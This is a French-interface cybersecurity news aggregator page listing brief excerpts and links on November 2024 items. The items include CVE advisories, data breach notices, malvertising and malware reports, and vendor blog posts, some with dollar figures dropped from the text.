What is the Vulnerability?CISA has added CVE-2024-5910, a missing authentication vulnerability in Palo Alto Networks Expedition to its known exploited vulnerability (KEV) list. Expedition is a migration tool aiding in configuration migration, tuning, and enrichment from one of the supported vendors to Palo Alto Networks. Successful exploitation of CVE-2024-5910 can lead to an admin account takeover. Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue.What is the recommended Mitigation?Palo Alto Networks has released security updates to address the vulnerability. This issue is fixed in Expedition 1.2.92 and all later versions. https://security.paloaltonetworks.com/CVE-2024-5910 What is FortiGuard Coverage?FortiGuard recommends users to apply...
https://fortiguard.fortinet.com/threat-signal-report/5575
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Finsure - 296,124 breached accounts
In October 2024, almost 300k unique email addresses from Australian mortgage broking group Finsure were obtained from the ActivePipe real estate marketing platform. The impacted data also included names, phone numbers and physical addresses. The incident did not directly affect any of Finsure's systems or expose any passwords or financial data.
https://haveibeenpwned.com/PwnedWebsites#Finsure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How REI Strengthens Security with HackerOne's Global Security Researcher Community
REI's senior application security engineer discusses their program success, evolving goals, and the value of the security researcher community.
https://www.hackerone.com/customer-story/rei-strengthens-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu des jours précédents

ASPM vs. CSPM: Key Differences
With dozens of cybersecurity threats out there, maintaining your company's security posture is more important than ever. And with so many types of technology to oversee—from cloud infrastructure to AI-generated code—there are just as many ways to manage your security practices. 
https://www.legitsecurity.com/blog/aspm-vs-cspm
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Compliance Automation: How to Get Started and Best Practices
Managing compliance manually is an uphill battle, especially when regulatory requirements are constantly changing.
https://www.legitsecurity.com/blog/compliance-automation-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Recently disclosed VMware vCenter Server bugs are actively exploited in attacks
Threat actors are actively exploiting two VMware vCenter Server vulnerabilities tracked as CVE-2024-38812 and CVE-2024-38813, Broadcom warns. Broadcom warns that the two VMware vCenter Server vulnerabilities CVE-2024-38812 and CVE-2024-38813 are actively exploited in the wild. “Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.” […]
https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden
A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An air fryer, a ring, and a vacuum get brought into a home. What they take out is your data (Lock and Code S05E24)
This week on the Lock and Code podcast, we tell three stories about air fryers, smart rings, and vacuums that want your data.
https://www.malwarebytes.com/blog/uncategorized/2024/11/an-air-fryer-a-ring-and-a-vacuum-get-brought-into-a-home-what-they-take-out-is-your-data-lock-and-code-s05e24
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

QuickBooks popup scam still being delivered via Google ads
When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.
https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Purple Team Activities: Where Offense Meets Defense to Strengthen Cyber Resilience
Purple team activities serve as a bridge between red and blue teams, combining offensive tactics with defensive strategies to enhance an organization's overall security posture. Unlike traditional siloed approaches, purple teaming fosters collaboration between attackers (red team) and defenders (blue team) to identify weaknesses, improve detection capabilities, and refine incident response processes.Red TeamThe Red Team simulates real-world adversaries to test an organization's defenses. Their main goal is to emulate tactics, techniques, and procedures (TTPs) that an actual attacker might use to breach systems. These activities can include penetration testing, social engineering (e.g., phishing campaigns), or advanced exploitation of vulnerabilities.Purpose: Identify weaknesses in security posture.Approach:...
https://infosecwriteups.com/purple-team-activities-where-offense-meets-defense-to-strengthen-cyber-resilience-82e76fafe76b?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

IDOR Leading To Improper Access Control
Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/idor-leading-to-improper-access-control-c3999aa28fc4?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Women In Cybersecurity On The Cybercrime Magazine Podcast
This week in cybersecurity from the editors at Cybercrime Magazine –Listen To Our Podcast Sausalito, Calif. – Nov. 18, 2024 Cybersecurity Ventures predicts that women will represent 30 percent of the global cybersecurity workforce by 2025, increasing to 35 percent by 2031, up from 25 percent The post Women In Cybersecurity On The Cybercrime Magazine Podcast appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/women-in-cybersecurity-on-the-cybercrime-magazine-podcast/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unlock 24/7 SOC Coverage: Rapid7 MXDR Now Supports with Microsoft Security Products
With the launch of Rapid7 MXDR's SOC support for key Microsoft security products, we're making it possible for organizations to layer security defenses and amplify outcomes.
https://blog.rapid7.com/2024/11/18/unlock-24-7-soc-coverage-rapid7-mxdr-now-supports-with-microsoft-security-products/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Inside Bitdefender Labs' Investigation of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta's social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Illegal Crypto Mining: How Businesses Can Prevent Themselves From Being ‘Cryptojacked'
The popularity of cryptocurrencies like Ethereum and Bitcoin surged during the pandemic era. What began as a niche, almost novelty form of payment in the 2010s, transformed into a legitimate... The post Illegal Crypto Mining: How Businesses Can Prevent Themselves From Being ‘Cryptojacked' appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/illegal-crypto-mining-how-businesses-can-prevent-themselves-from-being-cryptojacked/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unlocking Cybersecurity Talent: The Power of Apprenticeships
Cybersecurity is a fast-growing field, with a constant need for skilled professionals. But unlike other professions — like medicine or aviation — there's no clear-cut pathway to qualifying for cybersecurity positions. For employers and job seekers alike, this can make the journey to building a team (or entering a successful cybersecurity career) feel uncertain. Enter the registered apprenticeship program — a proven method for developing skilled talent in cybersecurity that benefits both the employer and the new professional. Let's commit to supporting this important talent development approach
https://www.nist.gov/blogs/cybersecurity-insights/unlocking-cybersecurity-talent-power-apprenticeships
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Preventing refactoring or how to make legacy code something to be proud of
Legacy code has a reputation for being messy, outdated, and a reliable source of frustration.… Preventing refactoring or how to make legacy code something to be proud of on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/18/ready-preventing-refactoring-or-how-to-make-legacy-code-something-to-be-proud-of/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A week in security (November 11 – November 17)
A list of topics we covered in the week of November 11 to November 17 of 2024
https://www.malwarebytes.com/blog/news/2024/11/a-week-in-security-november-11-november-17
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Building a Powerful Packet Sniffing Tool with Python
A Practical Guide to Network Traffic Analysis for Developing an Advanced Packet SnifferContinue reading on InfoSec Write-ups »
https://infosecwriteups.com/building-a-powerful-packet-sniffing-tool-with-python-896545b1fd71?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Ransomware Jeopardizes Healthcare Organizations
Security challenges in the healthcare sector continue to grow as connected assets and attack surfaces expand. Organizations in any sector face financial ramifications in the aftermath of a successful attack,... The post How Ransomware Jeopardizes Healthcare Organizations appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/how-ransomware-jeopardizes-healthcare-organizations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

High Performance Software Defined Receivers
Introduction As cybersecurity challenges grow more complex, the tools we use to protect data and communications are also advancing. Among these tools, high-performance software defined receivers (SDRs) with tuning ranges... The post High Performance Software Defined Receivers appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/high-performance-software-defined-receivers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability
What is the Vulnerability?Microsoft Windows contains an NTLMv2 hash spoofing vulnerability (CVE-2024-43451) that could result in disclosing a user's NTLMv2 hash to an attacker via a file open operation. The attacker can leverage this hash to impersonate that user with minimal interaction from the victim. This vulnerability (CVE-2024-43451) has been added to CISA's Known Exploited Vulnerabilities Catalog (KEV) list on November 12, 2024.What is the recommended Mitigation?Microsoft has released a security update to fix the vulnerability on November 12, 2024. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43451 What FortiGuard Coverage is available?FortiGuard recommends users to apply the fix provided by the vendor as soon as possible.FortiGuard IPS protection is available, and...
https://fortiguard.fortinet.com/threat-signal-report/5593
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Weekly Wrap-Up: 11/15/2024
This week's Metasploit Weekly Wrap-Up includes an exploit module for the Palo Alto Expedition exploit chain that's been making headlines recently.
https://blog.rapid7.com/2024/11/15/metasploit-weekly-wrap-up-43/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Future of Cybersecurity: Predictions for 2025 and Beyond
by Gary S. Miliefsky, CISSP, fmDHS As the publisher of Cyber Defense Magazine, I have a great honor and pleasure to meet with many of the market leaders and innovators... The post The Future of Cybersecurity: Predictions for 2025 and Beyond appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-future-of-cybersecurity-predictions-for-2025-and-beyond/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Flexible Data Retrieval at Scale with HAQL
HAQL: HackerOne's simplified query interface for writing performant aggregate queries on tables modeled purposefully for data analysis.
https://www.hackerone.com/engineering/haql
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Retrofitting spatial safety to hundreds of millions of lines of C++
Posted by Alex Rebert and Max Shavrick, Security Foundations, and Kinuko Yasuda, Core Developer Attackers regularly exploit spatial memory safety vulnerabilities, which occur when code accesses a memory allocation outside of its intended bounds, to compromise systems and sensitive data. These vulnerabilities represent a major security risk to users.  Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade: Breakdown of memory safety CVEs exploited in the wild by vulnerability class.1 Google is taking a comprehensive approach to memory safety. A key element of our strategy focuses on Safe Coding and using memory-safe languages in new code. This leads...
http://security.googleblog.com/2024/11/retrofitting-spatial-safety-to-hundreds.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI in SecOps: How AI is Impacting Red and Blue Team Operations
View survey results and analysis of how AI in SecOps is impacting red and blue team operations.
https://www.hackerone.com/ai/sans-red-blue-team-ops
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Malicious QR codes sent in the mail deliver malware
A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.
https://www.malwarebytes.com/blog/news/2024/11/malicious-qr-codes-sent-in-the-mail-deliver-malware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations
Rapid7's InsightIDR, the foundation of our Managed Detection and Response (MDR) service, empowers security teams with advanced analytics, automation, and expert-led investigations.
https://blog.rapid7.com/2024/11/15/new-idr-log-search-enhancements-accelerate-streamline-and-simplify-investigations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity dominates concerns among the C-suite, small businesses and the nation
Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data […] The post Cybersecurity dominates concerns among the C-suite, small businesses and the nation appeared first on Security Intelligence.
https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CEOs need to act today to outsmart adversaries with AI
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in Crain’s Detroit Business Sausalito, Calif. – Nov. 15, 2024 Cyber adversaries — the bad guys — are leveraging AI to infiltrate IT environments and compromise data on an unprecedented scale, The post CEOs need to act today to outsmart adversaries with AI appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ceos-need-to-act-today-to-outsmart-adversaries-with-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Guarding the Games: Cybersecurity and the 2024 Summer Olympics
As Paris prepares to host the 2024 Summer Olympic Games, athletes from around the world converge to represent their country. But beyond the cheers and medals lies a digital underworld.... The post Guarding the Games: Cybersecurity and the 2024 Summer Olympics appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/guarding-the-games-cybersecurity-and-the-2024-summer-olympics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zero-Day Exploitation Targeting Palo Alto Networks Firewall Management Interfaces
Palo Alto Networks has indicated they are observing threat activity exploiting a zero-day unauthenticated remote command execution vulnerability in their firewall management interfaces.
https://blog.rapid7.com/2024/11/15/etr-zero-day-exploitation-targeting-palo-alto-networks-firewall-management-interfaces/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Halliburton Cyberattack Update: Losses Worth Million Hit The Firm
Months after the cybersecurity incident, the oil giant Halliburton shared details about the financial losses.… Halliburton Cyberattack Update: Losses Worth Million Hit The Firm on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/halliburton-cyberattack-update-losses-worth-35-million-hit-the-firm/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Role of Proxies in Modern Cybersecurity & Protecting Data
In an increasingly digital world, data is everything. From sensitive business information to customer records,… The Role of Proxies in Modern Cybersecurity & Protecting Data on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/the-role-of-proxies-in-modern-cybersecurity-protecting-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Importance of Data Security Posture Management (DSPM) in Today's Digital Landscape
DSPM: Much More than Data Traffic Control For today’s CISOs, DPOs, and other data security… The Importance of Data Security Posture Management (DSPM) in Today's Digital Landscape on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/the-importance-of-data-security-posture-management-dspm-in-todays-digital-landscape/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Released November 2024 Patch Tuesday With ~90 Fixes
This week marked the arrival of the monthly scheduled updates from Microsoft. With November 2024… Microsoft Released November 2024 Patch Tuesday With ~90 Fixes on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/15/microsoft-released-november-2024-patch-tuesday-with-90-fixes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A decade of Cyber Essentials: the journey towards a safer digital future
The 10-year anniversary of Cyber Essentials is not just a celebration of past achievements but a call to action for the future.
https://www.ncsc.gov.uk/blog-post/cyber-essentials-decade
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

An Interview With the Target & Home Depot Hacker
In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and seeking publicity for several new money making schemes.
https://krebsonsecurity.com/2024/11/an-interview-with-the-target-home-depot-hacker/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CSA Community Spotlight: Addressing Emerging Security Challenges with CISO Pete Chronis
As the Cloud Security Alliance (CSA) celebrates its 15th anniversary, we reflect on the pivotal role CSA volunteers and contributors have played in shaping the future of cloud security. Founded in 2009, CSA quickly established itself as an instrumental leader in the cloud security space, dedicated to defining and promoting best practices for securing the cloud. These best practices are realized in our cloud security-specific research publications, training programs, professional certificates,...
https://cloudsecurityalliance.org/articles/csa-community-spotlight-addressing-emerging-security-challenges-with-ciso-pete-chronis
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Top Threat #5 - Third Party Tango: Dancing Around Insecure Resources
Written by CSA's Top Threats Working Group.In this blog series, we cover the key security challenges from CSA's Top Threats to Cloud Computing 2024. Drawing from insights of over 500 experts, we'll discuss the 11 top cybersecurity threats, their business impact, and how to tackle them. Whether you're a professional or a beginner, this series offers a clear guide to the evolving cloud security landscape.Today's post covers the #5 top threat: Insecure Third-Party Resources.What is Cybersecurity...
https://cloudsecurityalliance.org/articles/top-threat-5-third-party-tango-dancing-around-insecure-resources
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack
North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities. The post Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

122 million people’s business contact info leaked by data broker
A data broker has confirmed a business contact information database containing 132.8 million records has been leaked online.
https://www.malwarebytes.com/blog/news/2024/11/122-million-peoples-business-contact-info-leaked-by-data-broker
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why that Google Meet error might be a sneaky hacker trick

https://www.proofpoint.com/us/newsroom/news/why-google-meet-error-might-be-sneaky-hacker-trick
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Containerizing WordPress: Best Practices for Robust Security and Management
Keeping WordPress secure can be challenging, especially when considering Linux security concerns in a typical LAMP stack setup. Most WordPress security issues stem from third-party plugins, insecure coding, and server-level vulnerabilities in a typical LAMP stack setup-Linux, Apache, MySQL, PHP-to build and deploy WordPress.
https://linuxsecurity.com/features/features/containerizing-wordpress-security-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why Application-Specific Passwords are a Security Risk in Google Workspace
Originally published by Valence.Written by Jason Silberman.The digital world is constantly changing, and with it, the methods used to secure sensitive information. Decisions made years ago continue to shape today's landscape. The inception of Gmail by Google marked a pivotal moment in history, setting the foundation for the Google Account as we know it today. Unfortunately, the platform's early choices still cast a shadow on today's security posture for everyone who uses it. This blog post wi...
https://cloudsecurityalliance.org/articles/why-application-specific-passwords-are-a-security-risk-in-google-workspace
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Managing AI Risk: Three Essential Frameworks to Secure Your AI Systems
Originally published by BARR Advisory.Artificial intelligence (AI) is transforming the way businesses operate across industries, driving advancements in automation, decision-making, and customer experiences. From healthcare to finance, AI has unlocked new opportunities for efficiency and innovation. However, with this rapid evolution comes a new set of challenges. As AI becomes more integrated into business processes, organizations must address the risks posed by these emerging technologies, ...
https://cloudsecurityalliance.org/articles/managing-ai-risk-three-essential-frameworks-to-secure-your-ai-systems
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Group-Based Permissions and IGA Shortcomings in the Cloud
Originally published by Britive.Groups make it easier to assign permissions to multiple users at once, reducing the administrative burden and shortening delays on getting appropriate levels of access. Traditional identity governance and administration (IGA) solutions have been pivotal in managing roles and groups across various systems within organizations. However, as organizations expand and modernize their cloud footprint, the limitations of traditional IGA solutions and utilizing groups f...
https://cloudsecurityalliance.org/articles/group-based-permissions-and-iga-shortcomings-in-the-cloud
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How AI Changes End-User Experience Optimization and Can Reinvent IT
Originally published by CXO Revolutionaries.Written by Christopher Jablonski, Director, CXO REvolutionaries & Community.Improving the user experience is a top priority as businesses adapt to hybrid work, increase usage of SaaS applications, and new business demands. Everyone — employees, partners, and customers — seems to expect the digital world to operate flawlessly. But from an IT perspective, it's a daily struggle. The good news is that solutions are emerging that use AI to identify i...
https://cloudsecurityalliance.org/articles/how-ai-changes-end-user-experience-optimization-and-can-reinvent-it
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From risks to resilience: Best practices for software supply chain security
As software supply chains evolve in complexity, managing security risks has become an ever-changing challenge. New threats emerge daily, driven by rapid innovation and the heavy reliance on open source components.
https://www.sonatype.com/blog/from-risks-to-resilience-best-practices-for-software-supply-chain-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fortifying the Future: AI Security Is The Cornerstone Of The AI And GenAI Ecosystem
The rapid proliferation of AI technologies is bringing about significant advancements, but it has also introduced a wide range of security challenges. Large language models (LLMs) and computer vision models,... The post Fortifying the Future: AI Security Is The Cornerstone Of The AI And GenAI Ecosystem appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/fortifying-the-future-ai-security-is-the-cornerstone-of-the-ai-and-genai-ecosystem/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ISO/IEC 27001 Certification: Process and Costs
To safeguard your company's data against hackers, scammers, and other web criminals, you need an effective system. And one of the most foolproof ways is achieving ISO/IEC 27001 certification.
https://www.legitsecurity.com/blog/iso-27001-certification
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is a Software Supply Chain?
Imagine building a house brick by brick only to find out some bricks were faulty. One weak point puts the entire structure at risk, and it takes time and effort to redo what went wrong.
https://www.legitsecurity.com/blog/what-is-software-supply-chain
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Android Malware & Security Issue 2st Week of November, 2024
ASEC Blog publishes “Android Malware & Security Issue 2st Week of November, 2024” 게시물 Android Malware & Security Issue 2st Week of November, 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84521/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future
As the digital world evolves, businesses increasingly rely on cloud solutions to store data, run operations and manage applications. However, with this growth comes the challenge of ensuring that cloud environments remain secure and compliant with ever-changing regulations. This is where the idea of autonomous security for cloud (ASC) comes into play. Security and compliance […] The post Autonomous security for cloud in AWS: Harnessing the power of AI for a secure future appeared first on Security Intelligence.
https://securityintelligence.com/posts/autonomous-security-for-cloud-in-aws/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity in Crisis: How to Combat the .5 Trillion Cybercrime Surge
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in The CTO Club Sausalito, Calif. – Nov. 14, 2024 With global cybercrime costs projected to reach .5 trillion annually by 2025, according to Cybersecurity Ventures, organizations across industries are feeling the The post Cybersecurity in Crisis: How to Combat the .5 Trillion Cybercrime Surge appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-in-crisis-how-to-combat-the-10-5-trillion-cybercrime-surge/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Advertisers are pushing ad and pop-up blockers using old tricks
A malvertising campaign using an old school trick was found pushing to different ad blockers.
https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-and-pop-up-blockers-using-old-tricks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scammer robs homebuyers of life savings in million theft spree
A scammer was caught after they defrauded some 400 people for almost million in real estate.
https://www.malwarebytes.com/blog/news/2024/11/scammer-robs-homebuyers-of-life-savings-in-20-million-theft-spree
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake IP checker utilities on npm are crypto stealers
Recently identified npm packages called "node-request-ip", "request-ip-check" and "request-ip-validator" impersonate handy open source utilities relied upon by developers to retrieve an external IP address but instead target Windows, Linux and macOS users with malicious executables which are trojans and cryptocurrency stealers.
https://www.sonatype.com/blog/fake-ip-checker-utilities-on-npm-are-crypto-stealers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Сrimeware and financial cyberthreats in 2025
Kaspersky's GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025.
https://securelist.com/ksb-financial-and-crimeware-predictions-2025/114565/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL: AllExtendedRights
In this post, we will explore the exploitation of Discretionary Access Control Lists (DACL) using the AllExtendedRights permission in Active Directory environments. With this permission, The post Abusing AD-DACL: AllExtendedRights appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-allextendedrights/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL: ForceChangePassword
In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the ForcePasswordChange permission in Active Directory environments. This permission is especially The post Abusing AD-DACL: ForceChangePassword appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-forcechangepassword/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne's Fall Day of Service

https://www.hackerone.com/culture-and-talent/hackerones-fall-day-service
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How HackerOne Disproved an MFA Bypass With a Spot Check
Read how HackerOne's internal security team disproved an alleged MFA bypass with a targeted Spot Check.
https://www.hackerone.com/vulnerability-management/spot-check-mfa-bypass
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Biometrics in the Cyber World
by Victoria Hargrove, Reporter, CDM In today's society, digital threats are happening at a consistent and concerning rate. Traditional authentication methods no longer stand a chance against preventing these threats.... The post Biometrics in the Cyber World appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/biometrics-in-the-cyber-world/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sonatype recognized as a leader in SCA software in Forrester Wave
We are thrilled to announce that The Forrester Wave™: Software Composition Analysis Software, Q4 2024 recently named Sonatype a leader in software composition analysis (SCA) software. Sonatype received the highest scores in the current offering and strategy categories among evaluated SCA software vendors.
https://www.sonatype.com/blog/sonatype-recognized-as-a-leader-in-sca-software-in-forrester-wave
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Safer with Google: New intelligent, real-time protections on Android to keep you safe
Posted by Lyubov Farafonova, Product Manager and Steve Kafka, Group Product Manager, Android User safety is at the heart of everything we do at Google. Our mission to make technology helpful for everyone means building features that protect you while keeping your privacy top of mind. From Gmail's defenses that stop more than 99.9% of spam, phishing and malware, to Google Messages' advanced security that protects users from 2 billion suspicious messages a month and beyond, we're constantly developing and expanding protection features that help keep you safe. We're introducing two new real-time protection features that enhance your safety, all while safeguarding your privacy: Scam Detection in Phone by Google to protect you from scams and fraud, and Google Play Protect live threat detection...
http://security.googleblog.com/2024/11/new-real-time-protections-on-Android.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Data Security Index annual report highlights evolving generative AI security needs
84% of surveyed organizations want to feel more confident about managing and discovering data input into AI apps and tools. The post Microsoft Data Security Index annual report highlights evolving generative AI security needs appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/11/13/microsoft-data-security-index-annual-report-highlights-evolving-generative-ai-security-needs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cloud Security Alliance Issues Comprehensive Guidelines for Auditing Artificial Intelligence (AI) Systems, Beyond Compliance
Paper presents a holistic overview and applicable methodology for impartially assessing intelligent systemsSEATTLE – Nov. 14, 2024 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, today released Artificial Intelligence (AI) Risk Management: Thinking Beyond Regulatory Boundaries. Drafted by CSA's AI Governance & Compliance Working Group, the document...
https://cloudsecurityalliance.org/articles/csa-issues-comprehensive-guidelines-for-auditing-ai-systems-beyond-compliance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Essential Features of an Effective Malware Sandbox
Malware sandboxes offer a safe and controlled environment to analyze potentially harmful software and URLs. However, not all sandboxes incorporate features that are essential for proper analysis. Let’s look at... The post 5 Essential Features of an Effective Malware Sandbox appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/5-essential-features-of-an-effective-malware-sandbox/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Trend Report on Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums and Markets of October 2024
Note    This trend report on the deep web and dark web of October 2024 is sectioned into Ransomware, Forums & Black Markets, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true.     Major Issues     1.  Ransomware     1.1. […] 게시물 Threat Trend Report on Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums and Markets of October 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84530/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Report on DDoSia Malware Launching DDoS Attacks Against Korean Institutions
The Russian hacktivist group NoName057 (16) has been active since March 2022, and their goal is to launch DDoS attacks against targets with anti-Russian views. In November 2024, NoName05, along with the pro-Russian hacktivist groups Cyber Army of Russia Reborn and Alixsec, launched DDoS attacks against the websites of major South Korean government agencies. The […] 게시물 Report on DDoSia Malware Launching DDoS Attacks Against Korean Institutions이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84531/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

XLoader Executed Through JAR Signing Tool (jarsigner.exe)
Recently, AhnLab SEcurity intelligence Center (ASEC) identified the distribution of XLoader malware using the DLL side-loading technique. The DLL side-loading attack technique saves a normal application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. The legitimate application used in the […] 게시물 XLoader Executed Through JAR Signing Tool (jarsigner.exe)이 ASEC에 처음 등장했습니다.
